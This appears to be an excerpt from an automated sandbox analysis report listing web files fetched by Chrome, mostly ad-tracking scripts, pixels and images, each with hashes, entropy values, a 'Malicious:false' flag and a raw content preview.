                                                                                                                                                                                                                                                                                                                                                                          URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTZef2smB-4WzKsOkrjN080E4YRXcWmVbIq6jcTxUMgr56k-eUFqy-Jm7D6EXXqB1WQfk-XifK51XMT1BsWcREtTRxd8-6dGx6m_nWYjXwYtdWuSM5xKwP0FgJhf4pxe8oEKqIizH5_bYtcQc3HUz44jaH9QX0JyjQKcO_NqOZwd1QZx9dzpk_d77Uaw/s300/Best%20Auto%20Insurance.png
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...,................sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx..{|..........I.$....&.Q..V./T.E./..hK..(...mU..PE.Z....*.*..... ..H@.U0$$.r!d...^.<.?..d...$&.....W.9{.....s.s.s...$..y0.+ ...".HLF.P"1.)B..d..%...".HLF.P"1..... 4M+--..S.....Z,.V;]3..x....QU....GDD.]#..s,........o***.{..i.N.*..v...M{..Z......?..#....Z.t..].~....3.G..=z....6.F.jL......k...l?...G...._:.......bUU.N...+...TTT..6...p.@qqq\\..o....w..Z......k......9]3.n..g......?......+....l..5...p8.^..(...jEE..iV.....{.ILLLII.........x.@Q.M..F|||...`.Q..\8~.x+T..O>..;>...k....N.\...w......_.d..u.....BNo..F..O.2EU......n...[.hQ..X.z5.....j...-^.....?--...?.a.3...&''.....W_m`.a..Z.*>>>!!a...s...... ..f........[.....|...'N....../..399..k...+.......<s.L.X......_.{.V;]..../.@YY..u.x<v...._.hQDD...?...n..|.f.....%.....?DTRR..#F.hMW{.}....pq...X.......C.[.V..=|.........qB........b...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4201)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):286646
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.546212393087258
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:2J+H1CEOFp7GYq0I6oI1Lirsic5e+q+qP9p6i1xcQLT+NW:a8OF1GMO5W8+qTB1xcQLTcW
                                                                                                                                                                                                                                                                                                                                                                          MD5:C330CC6CBE9078FC69F3424CD47CE1EA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:AA6470B2ACA16C7671E87940427BB57FE9C38EF1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:40BC285E3FCC0E8E4352C7AF0B218703F7EF8F9DDC757298CE02D07530C40DB9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BE2C752E89E869B8F998C5BF36969671C0FDC1180F98C2E901297E1C27211CF23FDEC5D3FF95F8F83190BABFAD0A307AB78BFB24826527324710BF30CA0D5839
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=AW-927141988&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":18,"vtp_instanceDestinationId":"AW-927141988","tag_id":13},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_isManualEnabled":false,"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAdd
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://alb.reddit.com/rp.gif?ts=1728897184685&id=a2_dy5o8mn2d6oc&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=631133ec-3227-461f-8a3a-bfa5fb517d3d&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_5afed25b&dpm=&dpcc=&dprc=
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1382)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):17945
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.330388445341784
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
                                                                                                                                                                                                                                                                                                                                                                          MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                          MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4955), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4955
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.815464302997629
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUD8KF/LVD:1DY0hf1bT47OIqWb1m8Kll
                                                                                                                                                                                                                                                                                                                                                                          MD5:47EEDCCBE793B63D601E8F8A5CBDB891
                                                                                                                                                                                                                                                                                                                                                                          SHA1:58046AFBDF172794C1C02E1F9138CF42812FE3AF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:488D6DACDC44FF78D1FC31D63104C9C715235FC5EA17AF36D8801FF6C517909E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:01BDE8732B0040BC15F946470454FBB0EB50DEA00FF47E654A9873A0574A9CAB68E69E377BC246980DB37C652E858C8C67770B3E14A9D52995972514F27C9A08
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/927141988/?random=1728903365624&cv=11&fst=1728903365624&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&ref=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&hn=www.googleadservices.com&frm=0&tiba=Cloud%20App%20Security%20Checklist%20%7C%20Google%20%26%20Microsoft%20365%20Security&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2077)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):8165
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.170009123489861
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:JHV1qcmiE3CEIFt7NSymyDWAZPp0yCEFXTfcbyLaC5TFkY0yW/GaKdgH:lXUIxSymDAZJFDfRLaOTO3ll7
                                                                                                                                                                                                                                                                                                                                                                          MD5:1FE9242E1AA9927550EDE83A5B2580D2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D4CF50D7980D60B0B178426309ED03C041180490
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:28F8362ED564A8EEE013CF418C0546E3FA81FDFF0045B3859D047A0E65ABA7F3
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C4800276B0A54D931D9A340974E80C3035D4C1D8CA2924B2B5AD487070080B00B889549824FCD4DBDFEF749D51029BFF51BE473C000BEF0550D64BC64A5CCEBB
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function() {. var dc = {};. var gu = "1040172889715587758A2B28B3F6BBD2";. var su = "1040172889715716B2CDCFAE4B6E35E8";. var gm = false;. var cn = "__dtsu";. var lg = {cv:"US",cs:"C",rv:"NY",rs:"C"};.. String.prototype.dts_hash_code=function(){var hash=0;if(this.length==0)return hash;for(i=0;i<this.length;i++){char=this.charCodeAt(i);hash=((hash<<5)-hash)+char;hash=hash&hash} return hash;};.. function _dtsi() {. a = document.createElement("a"), a.href = window.location.href, _dts.host = a.hostname, "undefined" != typeof document.referrer && document.referrer.length > 0 ? (_dts.r = document.referrer, _dts.p = _dts_gp(_dts.r), "q" in _dts.p ? _dts.q = _dts.p.q : "query" in _dts.p ? _dts.q = _dts.p.query : "p" in _dts.p ? _dts.q = _dts.p.p : "text" in _dts.p ? _dts.q = _dts.p.text : "wd" in _dts.p ? _dts.q = _dts.p.wd : _dts.q = 0) : (_dts.r = 0, _dts.q = 0). }. var _dts = {};. _dtsi();.. function __dtsinit() {. var c = document.cookie.spl
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 26516
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):10006
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.972403776947168
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:EctMuAWs1ilwUOinYsBR2VVb9DwBXj4NvPTfiuZGUJ9roqRrfsqTY:EGHlCsBR2Dg8Nvr6uZGUEifJTY
                                                                                                                                                                                                                                                                                                                                                                          MD5:636B6ED4F27E73B2552E78143432789A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FBE51C1AC59D2759D4B46952FA6876DC4F8C5766
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E895B289F668FAA8AB8D69B2C0E1926EF4004DD3D63E506AE813801968CF9C06
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C19D07F286CA767324770CCBE6B2CAFB3B68EC2393C112494BE9135F82B755698E9FAF0EAC450AF1620DA861BEADBCC45B8CFB8D88660647073FFF34B4A34943
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pxdrop.lijit.com/1.1550.828/a/US/t_.js?cid=c026&cls=sync
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........{{..8...U..BEl..U2q..I.$..]E.*2N..HF.ib...< .s..g.<.<....Gc.f.a.......2........C..t6..c6..z.UP.g......'.N!..m...^....z..c..xV.C..8..s.b.B.U.W>...S.}6........;.....s,>.{v.F.dU.0..|.........W............W:]......"^...W\.....W....o..8.|.~...{.....u..Q.Uu*..9.Uu.T..Yx...D.....5.H...G..,.$8.....c}.>M.....2]..y1....z%..L.YU2..U.P=QJ..M%..A}#.......;..........5.z.Z.E.O..{....&.......^}.@R.k..0.../.p.*....V;<...Ar.we.A2..`..[0n'.....*6.wG..Y.s.r.~z7.V.?4;g.."x..Y2.7.}."d...Ks.N..}.T.hz..qs[....K}/b.U.Q.:Q:R...;.l.{r&.do........R1''.Q..Q..S._.yry........r.>.z....@..o.t..z:N.....S..sQ.*5.+A.W^.'A2.....i|...n...J......V...w.-..z}@6...yN....7*p..Qw..i}.^.+.....n+gP.[....{^m..\...?W.'W..Y.J.`......Xa.3.O.......V.....NL...|.c..hQ..P....q.....]..Ix.......7....*..o\&l..W.....__.%_-.$|6>.L..+.._..;...X....:}H.V4m.....LqX9..d..??...........7.0...D=,.Z...30..L:..!....,.......{...8..j...`s..~9..vZlr.#.........ir ....U..l......."
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3220
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.920676407628461
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:s6O+94lH6P8gwW6XxShRkCJNMmwZpLMIhYR9PwZV1s+dQiw9bw0v7PhD147bVvAc:4+y+8goXs/NMmKNUt8DdQW0vCNr
                                                                                                                                                                                                                                                                                                                                                                          MD5:F332323777E558F3BAEB39B0032EB88F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A4F28F2C414CBF1BD3A508DDF806D0C74A3094F9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EBDCCA66912FF4F6DB1EA9E24A2A99197238CC94EE1DEEDABB51E81591AA6CE9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4D6E8B20DB8A16B6A0FF3AE129E074F35F1C83E9218EB09EC8CAE8D72656D25E48A6010C39B13E185C949374E1BBE6FD6A7161B4C23972F8AAB1EFF655338C6B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hs-fs/hubfs/MM%20Logos/ManagedMethods_Logo_NarrowWidth_ForLightBackgrounds_HEX_Color_150px.png?width=150&height=51&name=ManagedMethods_Logo_NarrowWidth_ForLightBackgrounds_HEX_Color_150px.png
                                                                                                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../.....P..T.?... "& S.a.......I..a..v...>..:.0....:...=.v#..........~Am..`m..../hk.......q9...ve...F5...ve.l.m....s.Y.i.T....V....v.'..e.\BJ.`.*.<S....Q@....re...m......m.l..`. ..XF.'....?..W..'c{5.i.f.|..&.pX...Fb.w.p.C.l.f....e...k.,.mjs.h........[.......m..b..*...m.S..[.]#..........m.m.m.m.m....k.r.#J..$.t8...#...H.p.E.K..x.(95<".B..pY .D..zv.9..k(..F...C....h...^..n..,......#..C..e....n..u..G..%U6:5C..h...<V..UHPi.6...\]9....L.k./..C"..s...n..h.Rs....T...@z....E..T.F.(Q.....B..*p.[)..V^O.6.*3...;....w..Io*..j.....V.B..?...VJBh+..A..U......b.G.....M..a.......g6..b...VhX.4A..u...$..._ZXd.M..>..$...?e...hE#.p...@/....\p.w....S..R..i.g.....(bvC).f.M.0..!^............#N.7.(.@....p.....@m..-.Z.aT...!/..\<...wk>.0a..$..............D.......|...i..K...a.@).w%.Y..Pek8..m...U..GQ...D...n.........|.?.^C..*4..t...*..-......q._.8.....A.."...p+.!V%.U.U:.*K..g.t.S.#U..$.?&.H.1!..Xa]...T.R.*l..|..@.V.....\."..zX..Jn...L.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (666), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):666
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.233014973891215
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:haxVfMbnp22AwEojP2gdvINe7WOoAvmbRXu6TT7eR4VXHVc8KsOPhIG:haHMpVjPDdvLqWYlDT7eRYFc8KZhIG
                                                                                                                                                                                                                                                                                                                                                                          MD5:7DC96CB40B7B2A6B543499EBA3AE09AB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:71F534FA3FFF44D9569BF7BFACD2EFBD7765E3E3
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:89EE29A34AF8FDB2A7D8AC73DF7F5A32B09B5BC1003FFE3A4BA1CFE367448004
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2461A2C451FD334B9707783C41B89859E47924FC6E3C99FE82DD5B10B2FCEA00B7BE1E2A624AC983F9A8223E1901B91728A2ACEFE36F55BFA38C33A6B9DF26B4
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://x.adroll.com/pxl/iframe_content.html?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><meta charset="UTF-8"><script>const urlParams=new URLSearchParams(document.location.search),adv=urlParams.get("advertisable"),fpc=urlParams.get("adroll_fpc").split("-")[0],origin=document.location.origin;let url=origin+"/igs?advertisable="+adv+"&fpc="+fpc;function joinInterestGroups(e=null){let n=null!==e?"&cd_label="+e:"";var o=new XMLHttpRequest;o.responseType="json",o.open("GET",url+n,!0),o.onload=()=>{o.response.forEach((e=>{navigator.joinAdInterestGroup(e,2592e3)}))},o.send(null)}"cookieDeprecationLabel"in navigator?navigator.cookieDeprecationLabel.getValue().then(joinInterestGroups):joinInterestGroups()</script></head></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (12052), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12052
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.872805211871056
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:GHjrCJwS2F9UbeCTVBlFsLsLetvyurto2b9qM7TRLJxk/:GHKJwS2FShThFsgQvyUo2b9qM7TVfk/
                                                                                                                                                                                                                                                                                                                                                                          MD5:6A2CE231EF5CA50653896D40E0053CBF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6A21A84C813970508AFCC189E8A4307A29D19EF5
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:37337DBFA749DDE221059F40CE299F48B4166DD683B4D350E87D87BEC7334E12
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:20BEA9CAE2A7C8AF2BE26FC26E7E4945EFFA794A0FBE9E5B60F47CFE6F80D0AF03941C38AD695BB4BAF10F0DD64E91A4FCF6FBE4C807F89144E5216EF0084E22
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2542884292174911&output=html&adk=1812271804&adf=3025194257&abgtt=3&lmt=1728897154&plaf=1%3A2%2C2%3A2%2C7%3A2&plat=1%3A128%2C2%3A128%2C3%3A128%2C4%3A128%2C8%3A128%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1081344%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Fald.my.id%2F&pra=7&wgl=1&aihb=0&asro=0&ailel=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33&aifxl=29_18~30_19&aiixl=29_5~30_6&aslmct=0.7&asamct=0.7&aiict=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152747&bpp=5&bdt=1835&idt=2179&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600%2C300x250&nras=1&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&fsapi=1&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&fsb=1&dtd=2206
                                                                                                                                                                                                                                                                                                                                                                          Preview:<script>var apcnf = '{"googMsgType":"apcnf","config":"[[[[null,0,null,[],null,null,\\\"DIV.site-info\\\"],4,[\\\"10px\\\",\\\"10px\\\",true],[5],null,[],[],1,[],[],[]],[[null,0,null,[],null,null,\\\"DIV.footer-container\\\\u003eDIV.container\\\"],1,[\\\"10px\\\",\\\"10px\\\",true],[3],null,[],[],1,[],[],[]],[[null,0,null,[],null,null,\\\"DIV#gmr-main-load\\\\u003eARTICLE.item-content.gmr-box-content.item-infinite.gmr-smallthumb.clearfix.post.type-post.status-publish.format-standard.has-post-thumbnail.hentry.category-trading.tag-forex.tag-forex-trading.tag-future.tag-trading.tag-trends.tag-watch\\\"],4,[\\\"10px\\\",\\\"10px\\\",false],[0],null,[],[],1,[],[6],[]],[[null,0,null,[],null,null,\\\"DIV#footer-content\\\"],4,[\\\"10px\\\",\\\"10px\\\",true],[5],null,[],[],1,[],[],[]],[[null,0,null,[],null,null,\\\"DIV#gmr-main-load\\\\u003eARTICLE.item-content.gmr-box-content.item-infinite.gmr-smallthumb.clearfix.post.type-post.status-publish.format-standard.has-post-thumbnail.hentry.category
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2
